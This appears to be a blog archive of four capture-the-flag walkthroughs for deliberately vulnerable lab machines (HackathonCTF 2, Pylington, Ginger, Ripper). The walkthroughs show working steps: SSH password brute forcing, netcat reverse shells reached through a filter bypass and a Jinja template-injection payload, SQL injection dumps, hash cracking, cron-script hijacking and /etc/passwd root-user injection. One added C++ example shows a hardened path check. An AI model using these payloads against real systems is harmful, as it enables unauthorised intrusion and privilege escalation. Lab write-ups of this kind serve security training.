Monthly archive: June 2021

Vulnhub HackathonCTF: 2 Walkthrough

https://www.vulnhub.com/entry/hackathonctf-2,714/

Difficulty: Easy

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.140  -oN ports.log            
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 17:17 CST
 Nmap scan report for bogon (192.168.33.140)              
 PORT     STATE SERVICE VERSION
 21/tcp   open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 |_-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 ...
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 1 disallowed entry                                                 ...
 7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 ...

Grab the dictionary file from FTP.

 ~ ftp 192.168.33.140                                            
 Connected to 192.168.33.140.                                    
 220 (vsFTPd 3.0.3)                                              
 Name (192.168.33.140:kali): anonymous                            
 331 Please specify the password.                                
 Password:                                                        
 230 Login successful.                                            
 Remote system type is UNIX.                                      
 Using binary mode to transfer files.                            
 ftp> ls -la                                                      
 200 PORT command successful. Consider using PASV.                
 150 Here comes the directory listing.                            
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 .        
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 ..      
 -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 -rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 226 Directory send OK.                                          
 ftp> get word.dir                                                
 local: word.dir remote: word.dir            

Enumerate directories and files on port 80.

~ gobuster dir -u http://192.168.33.140 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 1254]
 /robots.txt           (Status: 200) [Size: 70]
 /happy                (Status: 200) [Size: 110]          

Visit /happy and check the page source: it reveals the username hackathonll.

```
~ curl http://192.168.33.140/happy
<html>
<title>happy</title>

<body><h1> Nothing is in here</h1></body>

<!-- username: hackathonll >

</html>
```


Brute force SSH with this username and the dictionary file.

~ hydra -l hackathonll -P word.dir 192.168.33.140 -s 7223 ssh -t64 -f
...
[DATA] attacking ssh://192.168.33.140:7223/
[7223][ssh] host: 192.168.33.140 login: hackathonll password: Ti@gO
[STATUS] attack finished for 192.168.33.140 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Log in via SSH and check sudo -l.

```
~ ssh hackathonll@192.168.33.140 -p 7223
...
$ sudo -l
Matching Defaults entries for hackathonll on hackathon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim
```

Run vim with sudo, press ":", enter "!/bin/bash", and we become root.

$ sudo vim                            

 root@hackathon:/home/hackathonll# id  
 uid=0(root) gid=0(root) groups=0(root)

Vulnhub Pylington: 1 Walkthrough

https://www.vulnhub.com/entry/pylington-1,684/

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                                      
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)    
 80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /register             (Status: 301) [Size: 239] [--> http://192.168.56.100/register/]
 /index.html           (Status: 200) [Size: 4065]                                      
 /assets               (Status: 301) [Size: 237] [--> http://192.168.56.100/assets/]  
 /404.html             (Status: 200) [Size: 3305]                                      
 /robots.txt           (Status: 200) [Size: 83]

Check robots.txt.

 ~ cat robots.txt    
 User-agent: *
 Disallow: /register
 Disallow: /login
 Disallow: /zbir7mn240soxhicso2z

Visit /zbir7mn240soxhicso2z to get a username and password.

 Username: steve
 Password: bvbkukHAeVxtjjVH

After logging in we get a Python IDE that filters certain strings. Build the forbidden strings by concatenation and pass them to exec to get a reverse shell.

 strimp='imp'+'ort'+' o'+'s;'
 strcmd='o'+'s.system("nc 192.168.56.150 1234 -e /bin/bash")'
 exec(strimp)
 exec(strcmd)

Get reverse shell.

 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:51044.
 id
 uid=33(http) gid=33(http) groups=33(http)

In the home folder of user py there is typing.cc.

 [http@archlinux py]$ ls -la
 ls -la
 total 56
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 .
 drwxr-xr-x 3 root root  4096 Apr  7 18:43 ..
 -rw------- 1 py   py      21 Dec 20 18:44 .bash_logout
 -rw------- 1 py   py      57 Dec 20 18:44 .bash_profile
 -rw------- 1 py   py     141 Dec 20 18:44 .bashrc
 -r-------- 1 py   py      11 Apr  9 12:04 password.txt
 drwx------ 2 py   py    4096 Apr  9 19:31 secret_stuff
 -r-sr-xr-x 1 py   py   19216 Apr  9 12:15 typing
 -r--r--r-- 1 py   py     689 Apr  9 12:15 typing.cc
 -r-------- 1 py   py      34 Apr  9 12:32 user.txt

Check the source code of typing.cc, then play the game to get the password of py.

 [http@archlinux py]$ ./typing
 ./typing
 Let's play a game! If you can type the sentence below, then I'll tell you my password.

 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 54ezhCGaJV

Log in via SSH as py; the /home/py/secret_stuff folder contains backup.cc.

[py@archlinux ~]$ cd secret_stuff/
 [py@archlinux secret_stuff]$ ls -la
 total 40
 drwx------ 2 py   py    4096 Apr  9 19:31 .
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 ..
 -rwsr-xr-x 1 root root 26128 Apr  9 19:30 backup
 -rw-r--r-- 1 root root   586 Apr  9 19:30 backup.cc
 [py@archlinux secret_stuff]$

Check source code of backup.cc.

```
[py@archlinux secret_stuff]$ cat backup.cc
#include <iostream>
#include <string>
#include <fstream>

int main(){
    std::cout<<"Enter a line of text to back up: ";
    std::string line;
    std::getline(std::cin,line);
    std::string path;
    std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
    std::getline(std::cin,path);

    if(!path.starts_with("/srv/backups/")){
        std::cout<<"The file must be inside the /srv/backups directory!\n";
    }
    else{
        std::ofstream backup_file(path,std::ios_base::app);
        backup_file<<line<<'\n';
    }
    return 0;
}
```


The check only tests the start of the raw string, so a path containing ../ still passes it. Since backup is setuid root, we can append a new root-privileged user to /etc/passwd.

[py@archlinux secret_stuff]$ ./backup
Enter a line of text to back up: root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd
[py@archlinux secret_stuff]$ su root2
Password:
[root@archlinux secret_stuff]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux archlinux 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux
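The hardened form of that prefix check, as an added example that is not the VM's backup.cc: normalise the path lexically before comparing it with the allowed directory, so a ../ in the input cannot escape it. The directory name is the one the VM's program uses; everything else is constructed here.

```cpp
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// Added example, not the VM's backup.cc: the same prefix check before and
// after hardening. The directory name is the one the VM's program uses.
static const std::string kBackupDir = "/srv/backups/";

// Lexically normalise an absolute path: drop empty and "." segments and let
// ".." pop the previous segment, so "/srv/backups/../../etc/passwd" becomes
// "/etc/passwd". Nothing here touches the filesystem.
std::string normalize_path(const std::string& p) {
    std::vector<std::string> parts;
    std::stringstream ss(p);
    std::string seg;
    while (std::getline(ss, seg, '/')) {
        if (seg.empty() || seg == ".") continue;
        if (seg == "..") {
            if (!parts.empty()) parts.pop_back();
            continue;
        }
        parts.push_back(seg);
    }
    std::string out;
    for (const std::string& s : parts) out += "/" + s;
    return out.empty() ? "/" : out;
}

static bool has_prefix(const std::string& s, const std::string& prefix) {
    return s.compare(0, prefix.size(), prefix) == 0;
}

// The VM's check: a plain prefix test on the raw user input. It accepts
// "/srv/backups/../../etc/passwd" because the string does start with the prefix.
bool vulnerable_check(const std::string& path) {
    return has_prefix(path, kBackupDir);
}

// Hardened check: require an absolute path, normalise it first, then test the
// prefix on the normalised form. Caveat: lexical normalisation does not resolve
// symlinks; a setuid program should additionally open the file with O_NOFOLLOW
// or compare realpath() of the parent directory against the allowed directory.
bool hardened_check(const std::string& path) {
    if (path.empty() || path[0] != '/') return false;
    return has_prefix(normalize_path(path), kBackupDir);
}

int main() {
    const std::string evil = "/srv/backups/../../etc/passwd";
    const std::string good = "/srv/backups/today.txt";
    std::cout << "vulnerable(" << evil << ") = " << vulnerable_check(evil) << "\n"
              << "hardened("   << evil << ") = " << hardened_check(evil)   << "\n"
              << "hardened("   << good << ") = " << hardened_check(good)   << "\n";
    return 0;
}
```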

HackMyVm Ginger Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ginger

Find IP of VM.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                                                         ...
 192.168.56.100  08:00:27:45:72:fc       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
 /latest.zip           (Status: 200) [Size: 16866701]

Scan WordPress for vulnerable plugins.

 ~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
 ...
 [+] cp-multi-view-calendar
  | Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
  | Last Updated: 2021-03-08T13:47:00.000Z
  | Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
  | [!] The version is out of date, the latest version is 1.3.99
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
  |
  | [!] 2 vulnerabilities identified:
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
  |     Fixed in: 1.1.5
  |     References:
  |      - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
  |      - https://www.exploit-db.com/exploits/36243/
  |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
  |     Fixed in: 1.1.8
  |     References:
  |      - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
  |      - https://www.exploit-db.com/exploits/37560/
  |
  | Version: 1.0.2 (50% confidence)
  | Found By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt

Search for the exploit in Exploit-DB.

 ~ searchsploit CP Multi View Event Calendar
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path
 ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection                   | php/webapps/35073.txt
 WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection                  | php/webapps/37560.txt
 ------------------------------------------------------------------------------------- ---------------------------------

Check 37560.txt to find the SQL injection point, then use sqlmap to dump the database.

 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5 --dbs --batch
 ...
 available databases [2]:
 [*] information_schema
 [*] wordpress_db
 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5  -D wordpress_db -T wp_users --dump
 ...
 Table: wp_users
 [1 entry]
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | 1  | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Crack the password hash with john the ripper.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 ~ john --show hash.txt            
 ?:sanitarium

Log in to WordPress as webmaster:sanitarium, open the plugin editor, and insert reverse shell code into akismet.php.


Request the modified file to trigger the shell code and get a reverse shell.

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

~ nc -nvlp 1234 ...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```


Found 3 users in /home.

www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster


Found a hint in sabrina's home folder.

www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory


Get the password through dmesg.

www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch


Log in via SSH as sabrina and check sudo -l.

sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *


Check app.py: it is a Flask HTTP server on port 5000 with a server-side template injection (SSTI), because the user-supplied name is formatted into the template string before it is rendered.

```
sabrina@ginger:~$ cat /opt/app.py
from flask import Flask, request, render_template_string,render_template

app = Flask(__name__)
@app.route('/')
def hello_ssti():
    person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
    if request.args.get('name'):
        person['name'] = request.args.get('name')
    template = '''<h2>Hello %s!</h2>''' % person['name']
    return render_template_string(template,person=person)
def get_user_file(f_name):
    with open(f_name) as f:
        return f.readlines()
app.jinja_env.globals['get_user_file'] = get_user_file

if __name__ == "__main__":
    app.run(debug=True)
```

Start the server as webmaster.

sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
  * Serving Flask app "app" (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: on
  * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
  * Restarting with stat
  * Debugger is active!
  * Debugger PIN: 260-511-262

In another terminal, forward local port 5000 to the VM's port 5000 over SSH.

 ~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100

Request the server with the SSTI payload.

```
127.0.0.1:5000/?name={{request.application.__globals__.__builtins__.__import__(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}
```


At the same time, listen with nc on the chosen port to receive the reverse shell as webmaster.

~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)


Upload id_rsa.pub to /home/webmaster/.ssh as authorized_keys and chmod it to 600.

```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
cd /home/webmaster
webmaster@ginger:~$ mkdir .ssh
mkdir .ssh
webmaster@ginger:~$ cd .ssh
cd .ssh
webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
...
Saving to: ‘authorized_keys’
authorized_keys     100%[===================>]     565  --.-KB/s    in 0s
webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
```

Now we can log in via SSH as webmaster.

~ ssh webmaster@192.168.56.100  
 ...
 webmaster@ginger:~$ id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload pspy64 to the VM and watch the process list.

```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh
```


UID 1002 is user caroline, and the /home/caroline/backup folder is writable by webmaster.

drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup


Write our own bash code into /home/caroline/backup/backup.sh.

```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
webmaster@ginger:/home/caroline$ rm backup/backup.sh
rm: remove write-protected regular file 'backup/backup.sh'? yes
webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/
```

Then we get a reverse shell as caroline. Again, upload id_rsa.pub to get SSH access, and check sudo -l.

caroline@ginger:~$ sudo -l
 Matching Defaults entries for caroline on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User caroline may run the following commands on ginger:
     (ALL : ALL) NOPASSWD: /srv/code

Disassemble /srv/code: it just calls chmod to make /etc/passwd world-writable for 5 seconds.

```
int __cdecl main(int argc, const char **argv, const char **envp)
{
  system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
  return 0;
}
```


Within those 5 seconds, we append a new root user with a password hash to /etc/passwd.

caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#

HackMyVm Ripper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. "Old ssh connection files" suggests a backup key such as id_rsa.bak.

```
cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.
```


Note that the VM's console screen shows the username jack.


Download id_rsa.bak and try to connect over SSH; the key is passphrase-protected.

wget http://192.168.56.100/id_rsa.bak
2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]

ssh jack@192.168.56.100 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':


Use the following loop to brute force the passphrase.

cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C "jack@192.168.56.100" -P "$pass" -f id_rsa.bak &>/dev/null; then echo "$pass"; break; fi; done
bananas


Log in as jack. After some enumeration, nothing useful was found.

Download linpeas from github. Upload to VM.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh


Run linpeas.sh; it finds a strange string in the opasswd file.

[+] Hashes inside passwd file? ........... No
[+] Writable passwd file? ................ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
[+] Can I write in network-scripts? ...... No
[+] Can I read root folder? .............. No


It is the password of another user, helder.

Download pspy64 from GitHub (https://github.com/DominicBreuker/pspy), upload it to the VM, and watch system processes.

2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1206 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi


The shell code means: root reads a string (say XXX) from whoever answers on localhost port 10000, and if the contents of /root/.local/helder.txt equal those of /home/helder/passwd.txt, it sets the SUID bit on /usr/bin/XXX.

So we make passwd.txt a symbolic link to /root/.local/helder.txt (root's cat follows the link, so the two files compare equal) and serve the string "bash" on port 10000. After a minute, /usr/bin/bash has the SUID bit set.

helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
helder@ripper:~$echo bash |nc -nlvp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
helder@ripper:~$ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash


Finally, get root.

```
helder@ripper:~$/usr/bin/bash -p
helder@ripper:~$id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)
```